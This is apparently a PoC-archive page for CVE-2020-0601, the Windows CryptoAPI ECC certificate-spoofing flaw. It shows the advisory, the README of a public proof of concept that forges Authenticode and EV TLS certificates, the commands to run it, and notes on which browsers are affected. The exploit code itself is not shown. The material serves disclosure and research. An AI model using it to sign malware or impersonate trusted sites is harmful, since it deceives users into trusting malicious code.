Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%
Buy Us a Coffee

CVE-2020-0601 PoC — Microsoft Windows CryptoAPI 信任管理问题漏洞

Source
https://github.com/saleemrashid/badecparams
Associated Vulnerability
Title:Microsoft Windows CryptoAPI 信任管理问题漏洞 (CVE-2020-0601)
Description:A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates.An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source, aka 'Windows CryptoAPI Spoofing Vulnerability'.
Description
Proof of Concept for CVE-2020-0601
Readme
# BADECPARAMS

Proof of Concept for CVE-2020-0601.

![Screenshot of Extended Validation certificate for www.nsa.gov in Microsoft Edge](screenshot.png)
![Screenshot of 7-Zip installer with Authenticode digital signature](screenshot2.png)
![Screenshot of certificate for www.nsa.gov in Google Chrome](screenshot3.png)

[badecparams.py](badecparams.py) generates an intermediate certificate
authority that exploits the vulnerability, then issues Authenticode and TLS
certificates. The TLS certificates have Extended Validation in Microsoft Edge
and Internet Explorer.

[httpd.py](httpd.py) serves the contents of the [www](www) subfolder over
HTTPS, using the PEM encoded certificate chain provided on the command line.

```shell
./badecparams.py
./httpd.py localhost.key
```

### Vulnerable Software

Windows Update is not vulnerable because it uses public key pinning and RSA
keys.

The latest Windows Defender antivirus definitions detect executables signed
with malicious Authenticode certificates, even on machines without Microsoft's
patch.

Microsoft Edge, Internet Explorer, and Chromium (and derivatives) are
vulnerable to the TLS variant. Firefox is not vulnerable because Mozilla's
Network Security Services (NSS) does not support explicit EC parameters and
uses its own implementation for certificate verification.

Chrome 79.0.3945.130 fixes the vulnerability and throws
`NET::ERR_CERT_INVALID`, even on machines without Microsoft's patch.
File Snapshot

 [4.0K]  /data/pocs/b7274a40054e224cb7487615121beb841474c014
├── [ 12K]  badecparams.py
├── [4.3K]  comodoecccertificationauthority-ev-comodoca-com-chain.pem
├── [ 861]  httpd.py
├── [1.4K]  README.md
├── [180K]  screenshot2.png
├── [448K]  screenshot3.png
├── [316K]  screenshot.png
└── [4.0K]  www
    └── [ 205]  index.html

1 directory, 8 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →